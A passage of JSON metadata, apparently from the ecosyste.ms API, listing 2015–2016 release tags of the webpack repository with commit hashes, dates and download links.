itHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/we